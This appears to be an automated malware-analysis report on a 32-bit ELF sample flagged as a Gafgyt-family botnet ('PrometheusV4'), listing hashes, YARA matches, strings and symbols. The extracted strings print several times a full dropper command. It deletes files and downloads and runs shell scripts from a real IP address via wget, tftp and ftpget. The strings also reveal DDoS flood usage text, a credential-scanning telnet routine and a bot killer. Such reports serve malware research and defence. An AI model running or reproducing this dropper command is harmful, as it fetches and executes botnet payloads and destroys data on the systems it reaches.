Report #1780 cancel

Binary
ABI
ELFOSABI_SYSV
Size
101.92KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
81c96bb4a0f02af89c32d5e9d6a62701
sha1
2f7c9541ab0575c7c9eacd41caaaf027e3436eaa
crc32
0xbc93238e
sha224
5c43ee49e827b30c371a6113380558c956191546a676615400f8d507
sha256
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2
sha384
93fc459696485ff7337232f774b893ab0f84a913d0d4255b80fe3a11e5eee4f7df1b66b7376c1e36745fd8162a9e3996
sha512
333630359bcf2c7c0c39ce96eff9c72f8e595c7ee812049c2c3aedfab2412e6eb692dd727d781cb0347fd92c77a95787f5a785fb468c23b76102feddd7c61fa7
ssdeep
3072:dkSa5EJmeM4OqMdBwdSAGtDbhd5+hVgxsKcX6GcgbqB:dkAUHEnGtXhd5+TgxsKcXJcgbqB
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, Gafgyt_Botnet_jackmy, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
194.135.82.240, cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/* || /var/run/* || /var/system/* || /mnt/* || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.135.82.240/Merkury.sh; chmod 777 Merkury.sh; sh Merkury.sh; tftp 194.135.82.240 -c get Merkurytftp1.sh; chmod 777 Merkurytftp1.sh; sh Merkurytftp1.sh; tftp -r Merkurytftp2.sh -g 194.135.82.240; chmod 777 Merkurytftp2.sh; sh Merkurytftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.135.82.240 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Merkury.sh Merkurytftp1.sh Merkurytftp2.sh ftp1.sh; rm -rf *
URLs
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/* || /var/run/* || /var/system/* || /mnt/* || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.135.82.240/Merkury.sh; chmod 777 Merkury.sh; sh Merkury.sh; tftp 194.135.82.240 -c get Merkurytftp1.sh; chmod 777 Merkurytftp1.sh; sh Merkurytftp1.sh; tftp -r Merkurytftp2.sh -g 194.135.82.240; chmod 777 Merkurytftp2.sh; sh Merkurytftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.135.82.240 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Merkury.sh Merkurytftp1.sh Merkurytftp2.sh ftp1.sh; rm -rf *
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/* || /var/run/* || /var/system/* || /mnt/* || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.135.82.240/Merkury.sh; chmod 777 Merkury.sh; sh Merkury.sh; tftp 194.135.82.240 -c get Merkurytftp1.sh; chmod 777 Merkurytftp1.sh; sh Merkurytftp1.sh; tftp -r Merkurytftp2.sh -g 194.135.82.240; chmod 777 Merkurytftp2.sh; sh Merkurytftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.135.82.240 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Merkury.sh Merkurytftp1.sh Merkurytftp2.sh ftp1.sh; rm -rf *
%s %s HTTP/1.1
/etc/rc.conf
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
None Killed.
User-Agent: %s
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
194.135.82.240
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
been_there_done_that.3001
been_there_done_that
_fwrite.c
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
Remote address changed
No such device or address
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
COMMENCING BOT KILL ON -> %s
fork failed
Link has been severed
Object is remote
Too many open files
Too many links
Is a named type file
Connection reset by peer
Too many open files in system
No such device
BUILD %s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
LOGIN FOUND - %s:%s:%s
Operation not permitted
Invalid flag "%s"
Connection: %s
8.8.8.8
My Public IP: %s
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
usleep.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname_r
gethostbyname.c
socket_connect
opennameservers.c
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
socket.c
__nameservers
__read_etc_hosts_r
__get_hosts_byname_r
__open_etc_hosts
__GI_socket
sleep.c
sendHTTP
tcpcsum
PONG
HTTP
pipe.c
Software caused connection abort
Socket operation on non-socket
inet_addr
/boot/
sbtftp
sstftp
currentServer
sttftp
PromServer
STARTING SCANNER ON -> %s
Identifier removed

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, PrometheusV4.c, c, Q, i.4259, printchar, prints, printi, print, fdopen_pids, hextable, ipState, C.482.7624, C.531.7997, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getcwd.c, getdtablesize.c, getpagesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, fclose.c, fopen.c, sprintf.c, vsnprintf.c, _fopen.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, feof.c, fgets.c, fputs.c, fflush_unlocked.c, fgets_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasecmp.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, realloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, usleep.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getuid.c, mremap.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fgetc_unlocked.c, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fseeko.c, fseeko64.c, _READ.c, _adjust_pos.c, _rfill.c, _trans2r.c, _cs_funcs.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, encoded.c, decoded.c, lengthd.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, GetRandomPublicIP, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, usleep, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, GetRandomIP, tolower, getuid, system, __open_etc_hosts, feof, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, __GI_fputs, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, PromServer, __raise, setsockopt, bsd_signal, fseek, mremap, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, getCores, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, realloc, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, ClearHistory, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, ourPublicIP, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, strcmp, advances2, __nameserver, data_start, __GI_sysconf, infect, __h_errno_location, matchPrompt, getcwd, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, advance_state, _fini, __GI_chdir, __vfork, __GI_mmap, knownBots, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, __GI_getcwd, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, fputs, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number
759
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
170
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , PrometheusV4.c, , c, , Q, , i.4259, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , C.482.7624, , C.531.7997, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getcwd.c, , getdtablesize.c, , getpagesize.c, , getpid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , fclose.c, , fopen.c, , sprintf.c, , vsnprintf.c, , _fopen.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , feof.c, , fgets.c, , fputs.c, , fflush_unlocked.c, , fgets_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , bcopy.c, , strcasecmp.c, , strcasestr.c, , strtok.c, , next_start.1278, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , gethostbyname.c, , buf.5162, , h.5161, , gethostbyname_r.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , realloc.c, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , usleep.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getuid.c, , mremap.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , __C_ctype_tolower.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fgetc_unlocked.c, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , poll.c, , fseeko.c, , fseeko64.c, , _READ.c, , _adjust_pos.c, , _rfill.c, , _trans2r.c, , _cs_funcs.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , encoded.c, , decoded.c, , lengthd.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , contains_fail, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __GI_tolower, , recv, , connect, , __encode_question, , GetRandomPublicIP, , __GI___uClibc_fini, , numpids, , __encode_header, , __GI_strncat, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_vsnprintf, , __GI_setsid, , memmove, , sendTCP, , __bsd_signal, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getc_unlocked, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , read_until_response, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , usleep, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , wildString, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , __GI_fputs_unlocked, , execl, , __GI_fgets, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , GetRandomIP, , tolower, , getuid, , system, , __open_etc_hosts, , feof, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , reset_telstate, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , __searchdomain, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , __GI_fputs, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , 